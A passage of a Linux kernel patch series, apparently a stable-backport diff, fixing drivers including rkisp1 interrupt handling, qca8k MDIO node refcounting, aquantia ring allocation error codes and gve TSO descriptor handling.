++		.color_swap = RGA_COLOR_RB_SWAP,
+ 		.hw_format = RGA_COLOR_FMT_XBGR8888,
+ 		.depth = 32,
+ 		.uv_factor = 1,
+diff --git a/drivers/media/platform/rockchip/rkisp1/rkisp1-common.h b/drivers/media/platform/rockchip/rkisp1/rkisp1-common.h
+index a1293c45aae11..f9ec1c6138947 100644
+--- a/drivers/media/platform/rockchip/rkisp1/rkisp1-common.h
++++ b/drivers/media/platform/rockchip/rkisp1/rkisp1-common.h
+@@ -61,6 +61,14 @@ struct dentry;
+ 						 RKISP1_CIF_ISP_EXP_END |	\
+ 						 RKISP1_CIF_ISP_HIST_MEASURE_RDY)
+ 
++/* IRQ lines */
++enum rkisp1_irq_line {
++	RKISP1_IRQ_ISP = 0,
++	RKISP1_IRQ_MI,
++	RKISP1_IRQ_MIPI,
++	RKISP1_NUM_IRQS,
++};
++
+ /* enum for the resizer pads */
+ enum rkisp1_rsz_pad {
+ 	RKISP1_RSZ_PAD_SINK,
+@@ -441,7 +449,6 @@ struct rkisp1_debug {
+  * struct rkisp1_device - ISP platform device
+  *
+  * @base_addr:	   base register address
+- * @irq:	   the irq number
+  * @dev:	   a pointer to the struct device
+  * @clk_size:	   number of clocks
+  * @clks:	   array of clocks
+@@ -459,6 +466,7 @@ struct rkisp1_debug {
+  * @stream_lock:   serializes {start/stop}_streaming callbacks between the capture devices.
+  * @debug:	   debug params to be exposed on debugfs
+  * @info:	   version-specific ISP information
++ * @irqs:          IRQ line numbers
+  */
+ struct rkisp1_device {
+ 	void __iomem *base_addr;
+@@ -479,6 +487,7 @@ struct rkisp1_device {
+ 	struct mutex stream_lock; /* serialize {start/stop}_streaming cb between capture devices */
+ 	struct rkisp1_debug debug;
+ 	const struct rkisp1_info *info;
++	int irqs[RKISP1_NUM_IRQS];
+ };
+ 
+ /*
+diff --git a/drivers/media/platform/rockchip/rkisp1/rkisp1-csi.c b/drivers/media/platform/rockchip/rkisp1/rkisp1-csi.c
+index d7acc94e10f8d..e862f515cc6d3 100644
+--- a/drivers/media/platform/rockchip/rkisp1/rkisp1-csi.c
++++ b/drivers/media/platform/rockchip/rkisp1/rkisp1-csi.c
+@@ -141,8 +141,20 @@ static void rkisp1_csi_disable(struct rkisp1_csi *csi)
+ 	struct rkisp1_device *rkisp1 = csi->rkisp1;
+ 	u32 val;
+ 
+-	/* Mask and clear interrupts. */
++	/* Mask MIPI interrupts. */
+ 	rkisp1_write(rkisp1, RKISP1_CIF_MIPI_IMSC, 0);
++
++	/* Flush posted writes */
++	rkisp1_read(rkisp1, RKISP1_CIF_MIPI_IMSC);
++
++	/*
++	 * Wait until the IRQ handler has ended. The IRQ handler may get called
++	 * even after this, but it will return immediately as the MIPI
++	 * interrupts have been masked.
++	 */
++	synchronize_irq(rkisp1->irqs[RKISP1_IRQ_MIPI]);
++
++	/* Clear MIPI interrupt status */
+ 	rkisp1_write(rkisp1, RKISP1_CIF_MIPI_ICR, ~0);
+ 
+ 	val = rkisp1_read(rkisp1, RKISP1_CIF_MIPI_CTRL);
+diff --git a/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c b/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c
+index 2b76339f9381c..aeb6bb63667eb 100644
+--- a/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c
++++ b/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c
+@@ -114,6 +114,7 @@
+ struct rkisp1_isr_data {
+ 	const char *name;
+ 	irqreturn_t (*isr)(int irq, void *ctx);
++	u32 line_mask;
+ };
+ 
+ /* ----------------------------------------------------------------------------
+@@ -442,17 +443,25 @@ error:
+ 
+ static irqreturn_t rkisp1_isr(int irq, void *ctx)
+ {
++	irqreturn_t ret = IRQ_NONE;
++
+ 	/*
+ 	 * Call rkisp1_capture_isr() first to handle the frame that
+ 	 * potentially completed using the current frame_sequence number before
+ 	 * it is potentially incremented by rkisp1_isp_isr() in the vertical
+ 	 * sync.
+ 	 */
+-	rkisp1_capture_isr(irq, ctx);
+-	rkisp1_isp_isr(irq, ctx);
+-	rkisp1_csi_isr(irq, ctx);
+ 
+-	return IRQ_HANDLED;
++	if (rkisp1_capture_isr(irq, ctx) == IRQ_HANDLED)
++		ret = IRQ_HANDLED;
++
++	if (rkisp1_isp_isr(irq, ctx) == IRQ_HANDLED)
++		ret = IRQ_HANDLED;
++
++	if (rkisp1_csi_isr(irq, ctx) == IRQ_HANDLED)
++		ret = IRQ_HANDLED;
++
++	return ret;
+ }
+ 
+ static const char * const px30_isp_clks[] = {
+@@ -463,9 +472,9 @@ static const char * const px30_isp_clks[] = {
+ };
+ 
+ static const struct rkisp1_isr_data px30_isp_isrs[] = {
+-	{ "isp", rkisp1_isp_isr },
+-	{ "mi", rkisp1_capture_isr },
+-	{ "mipi", rkisp1_csi_isr },
++	{ "isp", rkisp1_isp_isr, BIT(RKISP1_IRQ_ISP) },
++	{ "mi", rkisp1_capture_isr, BIT(RKISP1_IRQ_MI) },
++	{ "mipi", rkisp1_csi_isr, BIT(RKISP1_IRQ_MIPI) },
+ };
+ 
+ static const struct rkisp1_info px30_isp_info = {
+@@ -484,7 +493,7 @@ static const char * const rk3399_isp_clks[] = {
+ };
+ 
+ static const struct rkisp1_isr_data rk3399_isp_isrs[] = {
+-	{ NULL, rkisp1_isr },
++	{ NULL, rkisp1_isr, BIT(RKISP1_IRQ_ISP) | BIT(RKISP1_IRQ_MI) | BIT(RKISP1_IRQ_MIPI) },
+ };
+ 
+ static const struct rkisp1_info rk3399_isp_info = {
+@@ -535,6 +544,9 @@ static int rkisp1_probe(struct platform_device *pdev)
+ 	if (IS_ERR(rkisp1->base_addr))
+ 		return PTR_ERR(rkisp1->base_addr);
+ 
++	for (unsigned int il = 0; il < ARRAY_SIZE(rkisp1->irqs); ++il)
++		rkisp1->irqs[il] = -1;
++
+ 	for (i = 0; i < info->isr_size; i++) {
+ 		irq = info->isrs[i].name
+ 		    ? platform_get_irq_byname(pdev, info->isrs[i].name)
+@@ -542,7 +554,12 @@ static int rkisp1_probe(struct platform_device *pdev)
+ 		if (irq < 0)
+ 			return irq;
+ 
+-		ret = devm_request_irq(dev, irq, info->isrs[i].isr, IRQF_SHARED,
++		for (unsigned int il = 0; il < ARRAY_SIZE(rkisp1->irqs); ++il) {
++			if (info->isrs[i].line_mask & BIT(il))
++				rkisp1->irqs[il] = irq;
++		}
++
++		ret = devm_request_irq(dev, irq, info->isrs[i].isr, 0,
+ 				       dev_driver_string(dev), dev);
+ 		if (ret) {
+ 			dev_err(dev, "request irq failed: %d\n", ret);
+diff --git a/drivers/media/platform/rockchip/rkisp1/rkisp1-isp.c b/drivers/media/platform/rockchip/rkisp1/rkisp1-isp.c
+index 585cf3f534692..00dca284c1222 100644
+--- a/drivers/media/platform/rockchip/rkisp1/rkisp1-isp.c
++++ b/drivers/media/platform/rockchip/rkisp1/rkisp1-isp.c
+@@ -281,11 +281,25 @@ static void rkisp1_isp_stop(struct rkisp1_isp *isp)
+ 	 * ISP(mi) stop in mi frame end -> Stop ISP(mipi) ->
+ 	 * Stop ISP(isp) ->wait for ISP isp off
+ 	 */
+-	/* stop and clear MI and ISP interrupts */
+-	rkisp1_write(rkisp1, RKISP1_CIF_ISP_IMSC, 0);
+-	rkisp1_write(rkisp1, RKISP1_CIF_ISP_ICR, ~0);
+ 
++	/* Mask MI and ISP interrupts */
++	rkisp1_write(rkisp1, RKISP1_CIF_ISP_IMSC, 0);
+ 	rkisp1_write(rkisp1, RKISP1_CIF_MI_IMSC, 0);
++
++	/* Flush posted writes */
++	rkisp1_read(rkisp1, RKISP1_CIF_MI_IMSC);
++
++	/*
++	 * Wait until the IRQ handler has ended. The IRQ handler may get called
++	 * even after this, but it will return immediately as the MI and ISP
++	 * interrupts have been masked.
++	 */
++	synchronize_irq(rkisp1->irqs[RKISP1_IRQ_ISP]);
++	if (rkisp1->irqs[RKISP1_IRQ_ISP] != rkisp1->irqs[RKISP1_IRQ_MI])
++		synchronize_irq(rkisp1->irqs[RKISP1_IRQ_MI]);
++
++	/* Clear MI and ISP interrupt status */
++	rkisp1_write(rkisp1, RKISP1_CIF_ISP_ICR, ~0);
+ 	rkisp1_write(rkisp1, RKISP1_CIF_MI_ICR, ~0);
+ 
+ 	/* stop ISP */
+diff --git a/drivers/media/usb/stk1160/stk1160-video.c b/drivers/media/usb/stk1160/stk1160-video.c
+index 4e966f6bf608d..366f0e4a5dc0d 100644
+--- a/drivers/media/usb/stk1160/stk1160-video.c
++++ b/drivers/media/usb/stk1160/stk1160-video.c
+@@ -107,8 +107,7 @@ void stk1160_copy_video(struct stk1160 *dev, u8 *src, int len)
+ 
+ 	/*
+ 	 * TODO: These stk1160_dbg are very spammy!
+-	 * We should 1) check why we are getting them
+-	 * and 2) add ratelimit.
++	 * We should check why we are getting them.
+ 	 *
+ 	 * UPDATE: One of the reasons (the only one?) for getting these
+ 	 * is incorrect standard (mismatch between expected and configured).
+@@ -151,7 +150,7 @@ void stk1160_copy_video(struct stk1160 *dev, u8 *src, int len)
+ 
+ 	/* Let the bug hunt begin! sanity checks! */
+ 	if (lencopy < 0) {
+-		stk1160_dbg("copy skipped: negative lencopy\n");
++		printk_ratelimited(KERN_DEBUG "copy skipped: negative lencopy\n");
+ 		return;
+ 	}
+ 
+diff --git a/drivers/mfd/Kconfig b/drivers/mfd/Kconfig
+index 9da8235cb6900..43cb511fd8ba7 100644
+--- a/drivers/mfd/Kconfig
++++ b/drivers/mfd/Kconfig
+@@ -1440,6 +1440,7 @@ config MFD_DAVINCI_VOICECODEC
+ 
+ config MFD_TI_AM335X_TSCADC
+ 	tristate "TI ADC / Touch Screen chip support"
++	depends on ARCH_OMAP2PLUS || ARCH_K3 || COMPILE_TEST
+ 	select MFD_CORE
+ 	select REGMAP
+ 	select REGMAP_MMIO
+diff --git a/drivers/misc/lis3lv02d/lis3lv02d_i2c.c b/drivers/misc/lis3lv02d/lis3lv02d_i2c.c
+index d7daa01fe7ca9..fdec2c30eb165 100644
+--- a/drivers/misc/lis3lv02d/lis3lv02d_i2c.c
++++ b/drivers/misc/lis3lv02d/lis3lv02d_i2c.c
+@@ -151,6 +151,7 @@ static int lis3lv02d_i2c_probe(struct i2c_client *client,
+ 	lis3_dev.init	  = lis3_i2c_init;
+ 	lis3_dev.read	  = lis3_i2c_read;
+ 	lis3_dev.write	  = lis3_i2c_write;
++	lis3_dev.reg_ctrl = lis3_reg_ctrl;
+ 	lis3_dev.irq	  = client->irq;
+ 	lis3_dev.ac	  = lis3lv02d_axis_map;
+ 	lis3_dev.pm_dev	  = &client->dev;
+diff --git a/drivers/net/bonding/bond_alb.c b/drivers/net/bonding/bond_alb.c
+index fc5da5d7744da..9c4c2c7d90ef5 100644
+--- a/drivers/net/bonding/bond_alb.c
++++ b/drivers/net/bonding/bond_alb.c
+@@ -985,7 +985,8 @@ static int alb_upper_dev_walk(struct net_device *upper,
+ 	if (netif_is_macvlan(upper) && !strict_match) {
+ 		tags = bond_verify_device_path(bond->dev, upper, 0);
+ 		if (IS_ERR_OR_NULL(tags))
+-			BUG();
++			return -ENOMEM;
++
+ 		alb_send_lp_vid(slave, upper->dev_addr,
+ 				tags[0].vlan_proto, tags[0].vlan_id);
+ 		kfree(tags);
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.h b/drivers/net/dsa/mv88e6xxx/chip.h
+index e693154cf8034..97a47d8743fd3 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.h
++++ b/drivers/net/dsa/mv88e6xxx/chip.h
+@@ -601,8 +601,8 @@ struct mv88e6xxx_ops {
+ 	int (*serdes_get_sset_count)(struct mv88e6xxx_chip *chip, int port);
+ 	int (*serdes_get_strings)(struct mv88e6xxx_chip *chip,  int port,
+ 				  uint8_t *data);
+-	int (*serdes_get_stats)(struct mv88e6xxx_chip *chip,  int port,
+-				uint64_t *data);
++	size_t (*serdes_get_stats)(struct mv88e6xxx_chip *chip, int port,
++				   uint64_t *data);
+ 
+ 	/* SERDES registers for ethtool */
+ 	int (*serdes_get_regs_len)(struct mv88e6xxx_chip *chip,  int port);
+diff --git a/drivers/net/dsa/mv88e6xxx/serdes.c b/drivers/net/dsa/mv88e6xxx/serdes.c
+index d94150d8f3f47..4c38df4982bfe 100644
+--- a/drivers/net/dsa/mv88e6xxx/serdes.c
++++ b/drivers/net/dsa/mv88e6xxx/serdes.c
+@@ -342,8 +342,8 @@ static uint64_t mv88e6352_serdes_get_stat(struct mv88e6xxx_chip *chip,
+ 	return val;
+ }
+ 
+-int mv88e6352_serdes_get_stats(struct mv88e6xxx_chip *chip, int port,
+-			       uint64_t *data)
++size_t mv88e6352_serdes_get_stats(struct mv88e6xxx_chip *chip, int port,
++				  uint64_t *data)
+ {
+ 	struct mv88e6xxx_port *mv88e6xxx_port = &chip->ports[port];
+ 	struct mv88e6352_serdes_hw_stat *stat;
+@@ -352,7 +352,7 @@ int mv88e6352_serdes_get_stats(struct mv88e6xxx_chip *chip, int port,
+ 
+ 	err = mv88e6352_g2_scratch_port_has_serdes(chip, port);
+ 	if (err <= 0)
+-		return err;
++		return 0;
+ 
+ 	BUILD_BUG_ON(ARRAY_SIZE(mv88e6352_serdes_hw_stats) >
+ 		     ARRAY_SIZE(mv88e6xxx_port->serdes_stats));
+@@ -798,8 +798,8 @@ static uint64_t mv88e6390_serdes_get_stat(struct mv88e6xxx_chip *chip, int lane,
+ 	return reg[0] | ((u64)reg[1] << 16) | ((u64)reg[2] << 32);
+ }
+ 
+-int mv88e6390_serdes_get_stats(struct mv88e6xxx_chip *chip, int port,
+-			       uint64_t *data)
++size_t mv88e6390_serdes_get_stats(struct mv88e6xxx_chip *chip, int port,
++				  uint64_t *data)
+ {
+ 	struct mv88e6390_serdes_hw_stat *stat;
+ 	int lane;
+diff --git a/drivers/net/dsa/mv88e6xxx/serdes.h b/drivers/net/dsa/mv88e6xxx/serdes.h
+index 29bb4e91e2f6b..67369054951fb 100644
+--- a/drivers/net/dsa/mv88e6xxx/serdes.h
++++ b/drivers/net/dsa/mv88e6xxx/serdes.h
+@@ -165,13 +165,13 @@ irqreturn_t mv88e6393x_serdes_irq_status(struct mv88e6xxx_chip *chip, int port,
+ int mv88e6352_serdes_get_sset_count(struct mv88e6xxx_chip *chip, int port);
+ int mv88e6352_serdes_get_strings(struct mv88e6xxx_chip *chip,
+ 				 int port, uint8_t *data);
+-int mv88e6352_serdes_get_stats(struct mv88e6xxx_chip *chip, int port,
+-			       uint64_t *data);
++size_t mv88e6352_serdes_get_stats(struct mv88e6xxx_chip *chip, int port,
++				  uint64_t *data);
+ int mv88e6390_serdes_get_sset_count(struct mv88e6xxx_chip *chip, int port);
+ int mv88e6390_serdes_get_strings(struct mv88e6xxx_chip *chip,
+ 				 int port, uint8_t *data);
+-int mv88e6390_serdes_get_stats(struct mv88e6xxx_chip *chip, int port,
+-			       uint64_t *data);
++size_t mv88e6390_serdes_get_stats(struct mv88e6xxx_chip *chip, int port,
++				  uint64_t *data);
+ 
+ int mv88e6352_serdes_get_regs_len(struct mv88e6xxx_chip *chip, int port);
+ void mv88e6352_serdes_get_regs(struct mv88e6xxx_chip *chip, int port, void *_p);
+diff --git a/drivers/net/dsa/qca/qca8k-8xxx.c b/drivers/net/dsa/qca/qca8k-8xxx.c
+index 1e94ba1031ece..641692f716f86 100644
+--- a/drivers/net/dsa/qca/qca8k-8xxx.c
++++ b/drivers/net/dsa/qca/qca8k-8xxx.c
+@@ -842,10 +842,15 @@ qca8k_mdio_register(struct qca8k_priv *priv)
+ 	struct dsa_switch *ds = priv->ds;
+ 	struct device_node *mdio;
+ 	struct mii_bus *bus;
++	int err;
++
++	mdio = of_get_child_by_name(priv->dev->of_node, "mdio");
+ 
+ 	bus = devm_mdiobus_alloc(ds->dev);
+-	if (!bus)
+-		return -ENOMEM;
++	if (!bus) {
++		err = -ENOMEM;
++		goto out_put_node;
++	}
+ 
+ 	bus->priv = (void *)priv;
+ 	snprintf(bus->id, MII_BUS_ID_SIZE, "qca8k-%d.%d",
+@@ -855,12 +860,12 @@ qca8k_mdio_register(struct qca8k_priv *priv)
+ 	ds->slave_mii_bus = bus;
+ 
+ 	/* Check if the devicetree declare the port:phy mapping */
+-	mdio = of_get_child_by_name(priv->dev->of_node, "mdio");
+ 	if (of_device_is_available(mdio)) {
+ 		bus->name = "qca8k slave mii";
+ 		bus->read = qca8k_internal_mdio_read;
+ 		bus->write = qca8k_internal_mdio_write;
+-		return devm_of_mdiobus_register(priv->dev, bus, mdio);
++		err = devm_of_mdiobus_register(priv->dev, bus, mdio);
++		goto out_put_node;
+ 	}
+ 
+ 	/* If a mapping can't be found the legacy mapping is used,
+@@ -869,7 +874,13 @@ qca8k_mdio_register(struct qca8k_priv *priv)
+ 	bus->name = "qca8k-legacy slave mii";
+ 	bus->read = qca8k_legacy_mdio_read;
+ 	bus->write = qca8k_legacy_mdio_write;
+-	return devm_mdiobus_register(priv->dev, bus);
++
++	err = devm_mdiobus_register(priv->dev, bus);
++
++out_put_node:
++	of_node_put(mdio);
++
++	return err;
+ }
+ 
+ static int
+@@ -1924,12 +1935,11 @@ qca8k_sw_probe(struct mdio_device *mdiodev)
+ 	priv->info = of_device_get_match_data(priv->dev);
+ 
+ 	priv->reset_gpio = devm_gpiod_get_optional(priv->dev, "reset",
+-						   GPIOD_ASIS);
++						   GPIOD_OUT_HIGH);
+ 	if (IS_ERR(priv->reset_gpio))
+ 		return PTR_ERR(priv->reset_gpio);
+ 
+ 	if (priv->reset_gpio) {
+-		gpiod_set_value_cansleep(priv->reset_gpio, 1);
+ 		/* The active low duration must be greater than 10 ms
+ 		 * and checkpatch.pl wants 20 ms.
+ 		 */
+diff --git a/drivers/net/ethernet/aquantia/atlantic/aq_ptp.c b/drivers/net/ethernet/aquantia/atlantic/aq_ptp.c
+index 28c9b6f1a54f1..abd4832e4ed21 100644
+--- a/drivers/net/ethernet/aquantia/atlantic/aq_ptp.c
++++ b/drivers/net/ethernet/aquantia/atlantic/aq_ptp.c
+@@ -953,8 +953,6 @@ int aq_ptp_ring_alloc(struct aq_nic_s *aq_nic)
+ {
+ 	struct aq_ptp_s *aq_ptp = aq_nic->aq_ptp;
+ 	unsigned int tx_ring_idx, rx_ring_idx;
+-	struct aq_ring_s *hwts;
+-	struct aq_ring_s *ring;
+ 	int err;
+ 
+ 	if (!aq_ptp)
+@@ -962,29 +960,23 @@ int aq_ptp_ring_alloc(struct aq_nic_s *aq_nic)
+ 
+ 	tx_ring_idx = aq_ptp_ring_idx(aq_nic->aq_nic_cfg.tc_mode);
+ 
+-	ring = aq_ring_tx_alloc(&aq_ptp->ptp_tx, aq_nic,
+-				tx_ring_idx, &aq_nic->aq_nic_cfg);
+-	if (!ring) {
+-		err = -ENOMEM;
++	err = aq_ring_tx_alloc(&aq_ptp->ptp_tx, aq_nic,
++			       tx_ring_idx, &aq_nic->aq_nic_cfg);
++	if (err)
+ 		goto err_exit;
+-	}
+ 
+ 	rx_ring_idx = aq_ptp_ring_idx(aq_nic->aq_nic_cfg.tc_mode);
+ 
+-	ring = aq_ring_rx_alloc(&aq_ptp->ptp_rx, aq_nic,
+-				rx_ring_idx, &aq_nic->aq_nic_cfg);
+-	if (!ring) {
+-		err = -ENOMEM;
++	err = aq_ring_rx_alloc(&aq_ptp->ptp_rx, aq_nic,
++			       rx_ring_idx, &aq_nic->aq_nic_cfg);
++	if (err)
+ 		goto err_exit_ptp_tx;
+-	}
+ 
+-	hwts = aq_ring_hwts_rx_alloc(&aq_ptp->hwts_rx, aq_nic, PTP_HWST_RING_IDX,
+-				     aq_nic->aq_nic_cfg.rxds,
+-				     aq_nic->aq_nic_cfg.aq_hw_caps->rxd_size);
+-	if (!hwts) {
+-		err = -ENOMEM;
++	err = aq_ring_hwts_rx_alloc(&aq_ptp->hwts_rx, aq_nic, PTP_HWST_RING_IDX,
++				    aq_nic->aq_nic_cfg.rxds,
++				    aq_nic->aq_nic_cfg.aq_hw_caps->rxd_size);
++	if (err)
+ 		goto err_exit_ptp_rx;
+-	}
+ 
+ 	err = aq_ptp_skb_ring_init(&aq_ptp->skb_ring, aq_nic->aq_nic_cfg.rxds);
+ 	if (err != 0) {
+diff --git a/drivers/net/ethernet/aquantia/atlantic/aq_ring.c b/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
+index 4d9d7d1edb9b3..9c314fe14ab62 100644
+--- a/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
++++ b/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
+@@ -132,8 +132,8 @@ static int aq_get_rxpages(struct aq_ring_s *self, struct aq_ring_buff_s *rxbuf)
+ 	return 0;
+ }
+ 
+-static struct aq_ring_s *aq_ring_alloc(struct aq_ring_s *self,
+-				       struct aq_nic_s *aq_nic)
++static int aq_ring_alloc(struct aq_ring_s *self,
++			 struct aq_nic_s *aq_nic)
+ {
+ 	int err = 0;
+ 
+@@ -156,46 +156,29 @@ static struct aq_ring_s *aq_ring_alloc(struct aq_ring_s *self,
+ err_exit:
+ 	if (err < 0) {
+ 		aq_ring_free(self);
+-		self = NULL;
+ 	}
+ 
+-	return self;
++	return err;
+ }
+ 
+-struct aq_ring_s *aq_ring_tx_alloc(struct aq_ring_s *self,
+-				   struct aq_nic_s *aq_nic,
+-				   unsigned int idx,
+-				   struct aq_nic_cfg_s *aq_nic_cfg)
++int aq_ring_tx_alloc(struct aq_ring_s *self,
++		     struct aq_nic_s *aq_nic,
++		     unsigned int idx,
++		     struct aq_nic_cfg_s *aq_nic_cfg)
+ {
+-	int err = 0;
+-
+ 	self->aq_nic = aq_nic;
+ 	self->idx = idx;
+ 	self->size = aq_nic_cfg->txds;
+ 	self->dx_size = aq_nic_cfg->aq_hw_caps->txd_size;
+ 
+-	self = aq_ring_alloc(self, aq_nic);
+-	if (!self) {
+-		err = -ENOMEM;
+-		goto err_exit;
+-	}
+-
+-err_exit:
+-	if (err < 0) {
+-		aq_ring_free(self);
+-		self = NULL;
+-	}
+-
+-	return self;
++	return aq_ring_alloc(self, aq_nic);
+ }
+ 
+-struct aq_ring_s *aq_ring_rx_alloc(struct aq_ring_s *self,
+-				   struct aq_nic_s *aq_nic,
+-				   unsigned int idx,
+-				   struct aq_nic_cfg_s *aq_nic_cfg)
++int aq_ring_rx_alloc(struct aq_ring_s *self,
++		     struct aq_nic_s *aq_nic,
++		     unsigned int idx,
++		     struct aq_nic_cfg_s *aq_nic_cfg)
+ {
+-	int err = 0;
+-
+ 	self->aq_nic = aq_nic;
+ 	self->idx = idx;
+ 	self->size = aq_nic_cfg->rxds;
+@@ -217,22 +200,10 @@ struct aq_ring_s *aq_ring_rx_alloc(struct aq_ring_s *self,
+ 		self->tail_size = 0;
+ 	}
+ 
+-	self = aq_ring_alloc(self, aq_nic);
+-	if (!self) {
+-		err = -ENOMEM;
+-		goto err_exit;
+-	}
+-
+-err_exit:
+-	if (err < 0) {
+-		aq_ring_free(self);
+-		self = NULL;
+-	}
+-
+-	return self;
++	return aq_ring_alloc(self, aq_nic);
+ }
+ 
+-struct aq_ring_s *
++int
+ aq_ring_hwts_rx_alloc(struct aq_ring_s *self, struct aq_nic_s *aq_nic,
+ 		      unsigned int idx, unsigned int size, unsigned int dx_size)
+ {
+@@ -250,10 +221,10 @@ aq_ring_hwts_rx_alloc(struct aq_ring_s *self, struct aq_nic_s *aq_nic,
+ 					   GFP_KERNEL);
+ 	if (!self->dx_ring) {
+ 		aq_ring_free(self);
+-		return NULL;
++		return -ENOMEM;
+ 	}
+ 
+-	return self;
++	return 0;
+ }
+ 
+ int aq_ring_init(struct aq_ring_s *self, const enum atl_ring_type ring_type)
+diff --git a/drivers/net/ethernet/aquantia/atlantic/aq_ring.h b/drivers/net/ethernet/aquantia/atlantic/aq_ring.h
+index 0a6c34438c1d0..52847310740a2 100644
+--- a/drivers/net/ethernet/aquantia/atlantic/aq_ring.h
++++ b/drivers/net/ethernet/aquantia/atlantic/aq_ring.h
+@@ -183,14 +183,14 @@ static inline unsigned int aq_ring_avail_dx(struct aq_ring_s *self)
+ 		self->sw_head - self->sw_tail - 1);
+ }
+ 
+-struct aq_ring_s *aq_ring_tx_alloc(struct aq_ring_s *self,
+-				   struct aq_nic_s *aq_nic,
+-				   unsigned int idx,
+-				   struct aq_nic_cfg_s *aq_nic_cfg);
+-struct aq_ring_s *aq_ring_rx_alloc(struct aq_ring_s *self,
+-				   struct aq_nic_s *aq_nic,
+-				   unsigned int idx,
+-				   struct aq_nic_cfg_s *aq_nic_cfg);
++int aq_ring_tx_alloc(struct aq_ring_s *self,
++		     struct aq_nic_s *aq_nic,
++		     unsigned int idx,
++		     struct aq_nic_cfg_s *aq_nic_cfg);
++int aq_ring_rx_alloc(struct aq_ring_s *self,
++		     struct aq_nic_s *aq_nic,
++		     unsigned int idx,
++		     struct aq_nic_cfg_s *aq_nic_cfg);
+ 
+ int aq_ring_init(struct aq_ring_s *self, const enum atl_ring_type ring_type);
+ void aq_ring_rx_deinit(struct aq_ring_s *self);
+@@ -207,9 +207,9 @@ int aq_ring_rx_clean(struct aq_ring_s *self,
+ 		     int budget);
+ int aq_ring_rx_fill(struct aq_ring_s *self);
+ 
+-struct aq_ring_s *aq_ring_hwts_rx_alloc(struct aq_ring_s *self,
+-		struct aq_nic_s *aq_nic, unsigned int idx,
+-		unsigned int size, unsigned int dx_size);
++int aq_ring_hwts_rx_alloc(struct aq_ring_s *self,
++			  struct aq_nic_s *aq_nic, unsigned int idx,
++			  unsigned int size, unsigned int dx_size);
+ void aq_ring_hwts_rx_clean(struct aq_ring_s *self, struct aq_nic_s *aq_nic);
+ 
+ unsigned int aq_ring_fill_stats_data(struct aq_ring_s *self, u64 *data);
+diff --git a/drivers/net/ethernet/aquantia/atlantic/aq_vec.c b/drivers/net/ethernet/aquantia/atlantic/aq_vec.c
+index f5db1c44e9b91..9769ab4f9bef0 100644
+--- a/drivers/net/ethernet/aquantia/atlantic/aq_vec.c
++++ b/drivers/net/ethernet/aquantia/atlantic/aq_vec.c
+@@ -136,35 +136,32 @@ int aq_vec_ring_alloc(struct aq_vec_s *self, struct aq_nic_s *aq_nic,
+ 		const unsigned int idx_ring = AQ_NIC_CFG_TCVEC2RING(aq_nic_cfg,
+ 								    i, idx);
+ 
+-		ring = aq_ring_tx_alloc(&self->ring[i][AQ_VEC_TX_ID], aq_nic,
+-					idx_ring, aq_nic_cfg);
+-		if (!ring) {
+-			err = -ENOMEM;
++		ring = &self->ring[i][AQ_VEC_TX_ID];
++		err = aq_ring_tx_alloc(ring, aq_nic, idx_ring, aq_nic_cfg);
++		if (err)
+ 			goto err_exit;
+-		}
+ 
+ 		++self->tx_rings;
+ 
+ 		aq_nic_set_tx_ring(aq_nic, idx_ring, ring);
+ 
+-		if (xdp_rxq_info_reg(&self->ring[i][AQ_VEC_RX_ID].xdp_rxq,
++		ring = &self->ring[i][AQ_VEC_RX_ID];
++		if (xdp_rxq_info_reg(&ring->xdp_rxq,
+ 				     aq_nic->ndev, idx,
+ 				     self->napi.napi_id) < 0) {
+ 			err = -ENOMEM;
+ 			goto err_exit;
+ 		}
+-		if (xdp_rxq_info_reg_mem_model(&self->ring[i][AQ_VEC_RX_ID].xdp_rxq,
++		if (xdp_rxq_info_reg_mem_model(&ring->xdp_rxq,
+ 					       MEM_TYPE_PAGE_SHARED, NULL) < 0) {
+-			xdp_rxq_info_unreg(&self->ring[i][AQ_VEC_RX_ID].xdp_rxq);
++			xdp_rxq_info_unreg(&ring->xdp_rxq);
+ 			err = -ENOMEM;
+ 			goto err_exit;
+ 		}
+ 
+-		ring = aq_ring_rx_alloc(&self->ring[i][AQ_VEC_RX_ID], aq_nic,
+-					idx_ring, aq_nic_cfg);
+-		if (!ring) {
+-			xdp_rxq_info_unreg(&self->ring[i][AQ_VEC_RX_ID].xdp_rxq);
+-			err = -ENOMEM;
++		err = aq_ring_rx_alloc(ring, aq_nic, idx_ring, aq_nic_cfg);
++		if (err) {
++			xdp_rxq_info_unreg(&ring->xdp_rxq);
+ 			goto err_exit;
+ 		}
+ 
+diff --git a/drivers/net/ethernet/google/gve/gve_tx_dqo.c b/drivers/net/ethernet/google/gve/gve_tx_dqo.c
+index 588d64819ed5e..e84e944d751d2 100644
+--- a/drivers/net/ethernet/google/gve/gve_tx_dqo.c
++++ b/drivers/net/ethernet/google/gve/gve_tx_dqo.c
+@@ -350,6 +350,7 @@ static void gve_tx_fill_pkt_desc_dqo(struct gve_tx_ring *tx, u32 *desc_idx,
+ /* Validates and prepares `skb` for TSO.
+  *
+  * Returns header length, or < 0 if invalid.
++ * Warning : Might change skb->head (and thus skb_shinfo).
+  */
+ static int gve_prep_tso(struct sk_buff *skb)
+ {
+@@ -451,8 +452,8 @@ gve_tx_fill_general_ctx_desc(struct gve_tx_general_context_desc_dqo *desc,
+ static int gve_tx_add_skb_no_copy_dqo(struct gve_tx_ring *tx,
+ 				      struct sk_buff *skb)
+ {
+-	const struct skb_shared_info *shinfo = skb_shinfo(skb);
+ 	const bool is_gso = skb_is_gso(skb);
++	struct skb_shared_info *shinfo;
+ 	u32 desc_idx = tx->dqo_tx.tail;
+ 
+ 	struct gve_tx_pending_packet_dqo *pkt;
+@@ -477,6 +478,8 @@ static int gve_tx_add_skb_no_copy_dqo(struct gve_tx_ring *tx,
+ 		desc_idx = (desc_idx + 1) & tx->mask;
+ 	}
+ 
++	/* Must get after gve_prep_tso(), which can change shinfo. */
++	shinfo = skb_shinfo(skb);
+ 	gve_tx_fill_general_ctx_desc(&tx->dqo.tx_ring[desc_idx].general_ctx,
+ 				     &metadata);
+ 	desc_idx = (desc_idx + 1) & tx->mask;
